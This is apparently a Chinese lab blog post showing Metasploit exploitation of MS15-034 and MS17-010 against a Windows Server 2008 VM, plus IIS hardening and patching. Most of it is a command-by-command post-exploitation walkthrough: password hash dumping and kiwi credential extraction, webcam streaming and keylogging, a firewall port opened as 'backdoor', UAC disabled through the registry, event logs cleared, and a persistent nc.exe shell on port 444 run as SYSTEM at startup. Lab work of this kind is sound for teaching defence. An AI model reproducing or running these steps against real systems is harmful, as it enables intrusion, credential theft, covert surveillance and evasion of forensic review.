网络安全: Kali Linux 使用 MSF 漏洞利用

cronaldo912024-03-07 18:16

目录

一、实验

1.环境

[2.POC验证与nmap扫描( ms15-034 )](#2.POC验证与nmap扫描( ms15-034 ))

[3. Kali Linux 使用 MSF 漏洞利用( ms15-034 )](#3. Kali Linux 使用 MSF 漏洞利用( ms15-034 ))

[4.Windows server 安全加固](#4.Windows server 安全加固)

[5.Windows server 安装补丁](#5.Windows server 安装补丁)

[6. Kali Linux 使用 MSF 漏洞验证 ( ms17-010)](#6. Kali Linux 使用 MSF 漏洞验证 ( ms17-010))

[7. Kali Linux 使用 MSF 漏洞利用( ms17-010 )](#7. Kali Linux 使用 MSF 漏洞利用( ms17-010 ))

[8. Kali Linux 进行 MSF 后渗透](#8. Kali Linux 进行 MSF 后渗透)

[9. Kali Linux 使用 持久性后门( nc)](#9. Kali Linux 使用 持久性后门( nc))

二、问题

1.CMD防火墙如何配置

2.CMD注册表如何配置

3.CMD计划任务如何配置

一、实验

1.环境

(1)主机

表1 主机

|----------------|---------|-----------------------------------------|-------------------|
| 系统 | 版本 | IP | 备注 |
| Kali Linux | 2024.1 | 192.168.204.146(动态) 192.168.204.100(静态) | |
| Windows server | 2008 R2 | 192.168.204.150 | Kali(2024.1)的目标主机 |

(2)查看Kali Linux (2024.1)系统版本

bash 复制代码 
cat /etc/os-release

(3)查看Kali Linux (2024.1)系统IP地址

bash 复制代码 
ip addr

(4) 查看Windows server 2008 IP 地址

bash 复制代码 
ipconfig

(5)openvas查看报告

点击CVEs查看通用漏洞编号(cve-2015-1635)

2.POC验证与nmap扫描( ms15-034 )

(1)执行验证脚本

VULN 存在漏洞

bash 复制代码 
 python2 cve-2015-1635.poc

(2)进入MSF 控制台

msfconsole

(3)扫描网段

目标主机为192.168.204.150

bash 复制代码 
db_nmap -sP 192.168.204.0/24

(4)扫描开放端口

bash 复制代码 
db_nmap -sV 192.168.204.150

3. Kali Linux 使用 MSF 漏洞利用( ms15-034 )

(1) 搜索 ms15-034 脚本

bash 复制代码 
search ms15-034

(2) 使⽤编号为 0 的脚本

use 0

(3) 设置⽬标主机

bash 复制代码 
 set rhosts 192.168.204.150

查看Windows server状态

(4)运⾏脚本

run

查看Windows server状态

4.Windows server 安全加固

(1)IIS管理器

(2)打开功能

(3)编辑功能设置

(4)关闭内核缓存

修改前:

修改后:

5.Windows server 安装补丁

(1)Windows 补丁查询

Microsoft Update Catalog

(2)搜索

bash 复制代码 
KB3042553

(3)安装补丁

重启

(4)Kali Lnux (2024.1) 使用MSF运⾏脚本

run

(5)Windows server

保持正常

(6)POC验证

Patched 补丁已修复

bash 复制代码 
 python2 cve-2015-1635.poc

6. Kali Linux 使用 MSF 漏洞验证 ( ms17-010)

(1) 进入MSF 控制台

msfconsole

(2) 搜索 ms17-010 脚本

bash 复制代码 
search ms17-010

(2) 使⽤编号为 0 的脚本

bash 复制代码 
use 3

(3) 设置⽬标主机

bash 复制代码 
 set rhosts 192.168.204.150

查看Windows server状态

(4)运⾏脚本

run

7. Kali Linux 使用 MSF 漏洞利用( ms17-010 )

(1) 使⽤编号为 0 的脚本

use 0

(3) 设置⽬标主机

bash 复制代码 
 set rhosts 192.168.204.150

查看Windows server状态

(4)运⾏脚本

bash 复制代码 
run

8. Kali Linux 进行 MSF 后渗透

(1)获取windows 服务器的密⽂密码

Administrator第3个冒号后内容为密码

bash 复制代码 
hashdump

(2) 解密

第一种方式:

bash 复制代码 
https://cmd5.com/

第二种方式:

MSF加载kiwi模块

(3)使用kiwi模块获取明⽂密码

加载 kiwi 模块

bash 复制代码 
load kiwi

检测所有凭证

bash 复制代码 
creds_all

(4)屏幕截图

bash 复制代码 
screenshot

(5)屏幕共享

bash 复制代码 
screenshare

(6)监控摄像头

bash 复制代码 
webcam_stream

(7)进程迁移

获取用户身份和进程列表

bash 复制代码 
getuid

getpid

查找 explorer 进程 (2704)

bash 复制代码 
 ps -S explorer

迁移进程到 explorer

bash 复制代码 
 migrate  2704

再次获取用户身份( 具有 administrator ⾝份)

bash 复制代码 
getuid

进程列表已切换

bash 复制代码 
getpid

(8)执⾏键盘操作记录

bash 复制代码 
run post/windows/capture/keylog_recorder

Windows server 新建文本文件

查看键盘操作记录

bash 复制代码 
vim /root/.msf4/loot/20240306131129_default_192.168.204.150_host.windows.key_889524.txt

结束 (CTRL + C)

(9)防⽕墙配置

进入 windows2008 的 cmd

消除乱码

bash 复制代码 
chcp  65001

检查防火墙状态 (目前为关闭)

防火墙设置开启状态

bash 复制代码 
netsh  advfirewall  set  allprofiles  state on

防火墙设置关闭状态

bash 复制代码 
netsh  advfirewall  set  allprofiles  state off

防火墙添加指定端口并启用 (后门端口别名为backdoor)

bash 复制代码 
netsh firewall add portopening tcp 444 backdoor enable all

查看

(10)UAC (用户账户控制设置)管理

查看

调整到最高

关闭

bash 复制代码 
reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

开启

bash 复制代码 
reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f

(11)清除日志

查看日志

应用程序日志

安全日志

安装日志

系统日志

退出 win2008 cmd

bash 复制代码 
exit

清除日志

bash 复制代码 
clearev

查看日志

9. Kali Linux 使用 持久性后门( nc)

(1)查看后门程序(nc.exe)

bash 复制代码 
ls /usr/share/windows-binaries

(2)上传后⻔程序nc.exe 到Windows server

bash 复制代码 
 upload /usr/share/windows-binaries/nc.exe c:\\windows\\system32

查看

(3)查看任务计划

WIN + R

bash 复制代码 
taskschd.msc

查看

(4) 进入 cmd 命令⾏

bash 复制代码 
cmd

(5)消除乱码

bash 复制代码 
chcp 65001

(6)配置注册表开机⾃启

bash 复制代码 
schtasks /create /tn "nc" /ru system /tr "c:\windows\system32\nc.exe -Ldp 444 -e cmd.exe" /sc onstart

查看

(7)重启

(8)查看进程

CTRL + SHIFT + ESC

(9)后门接入

bash 复制代码 
 nc 192.168.204.150 444

退出

bash 复制代码 
exit

二、问题

1.CMD防火墙如何配置

(1)配置

bash 复制代码 
netsh:network shell ⽹络管理⼯具
advfirewall:advanced firewall ⾼级防火墙
set:设置
allprofiles:all 所有的profiles 配置
state:状态
off:关闭
on:开启

2.CMD注册表如何配置

(1)配置

bash 复制代码 
ADD 添加⼀个注册表项
/v 创建键值  
/t 键值类型 
/d 键值的值                   1开/0关
/f  覆盖现有注册表项

3.CMD计划任务如何配置

(1)配置

bash 复制代码 
schtasks:scheduled tasks 计划任务
/create:创建
/tn: task name 任务名称
/ru:run user 运⾏⽤户
system:系统⽤户
/tr:task run 任务执⾏的操作
-Ldp:Listen and port 监听端⼝
-e:execute 执⾏
/sc:schedule 计划任务表示计划任务触发的时机
onstart:开机
相关推荐
HEX9CF10 分钟前
【CTF Web】Pikachu xss之href输出 Writeup(GET请求+反射型XSS+javascript:伪协议绕过)
开发语言·前端·javascript·安全·网络安全·ecmascript·xss
cuisidong199715 分钟前
如何在 Kali Linux 上安装 Google Chrome 浏览器
linux·运维·chrome
光通信学徒1 小时前
ubuntu图形界面右上角网络图标找回解决办法
linux·服务器·ubuntu·信息与通信·模块测试
wusam1 小时前
螺蛳壳里做道场:老破机搭建的私人数据中心---Centos下Docker学习03(网络及IP规划)
运维·服务器·网络·docker·容器
小小工匠1 小时前
加密与安全_HOTP一次性密码生成算法
算法·安全·htop·一次性密码
Tandy12356_1 小时前
js逆向——webpack实战案例(一)
前端·javascript·安全·webpack
南种北李1 小时前
Linux自动化构建工具Make/Makefile
linux·运维·自动化
一直在进步的派大星1 小时前
Docker 从安装到实战
java·运维·docker·微服务·容器
小飞猪Jay1 小时前
面试速通宝典——10
linux·服务器·c++·面试
哲伦贼稳妥2 小时前
一天认识一个硬件之电源
运维·其他·电脑·硬件工程
热门推荐
01【经验分享】Ubuntu22.04安装微信(linux官方版)02安卓系列机型永久去除data分区加密 详细步骤解析032024年高教社杯数学建模国赛C题超详细解题思路分析04组基轨迹建模 GBTM的介绍与实现(Stata 或 R)05RAG 实践- Ollama+RagFlow 部署本地知识库06【2024数模国赛赛题思路公开】国赛B题思路丨附可运行代码丨无偿自提07分享几个惊艳的 Three.js 个人站点08苍穹外卖面试总结09【2024高教社杯全国大学生数学建模竞赛】B题 生产过程中的决策问题——解题思路 代码 论文102024CCPC网络预选赛 I. 找行李 【DP】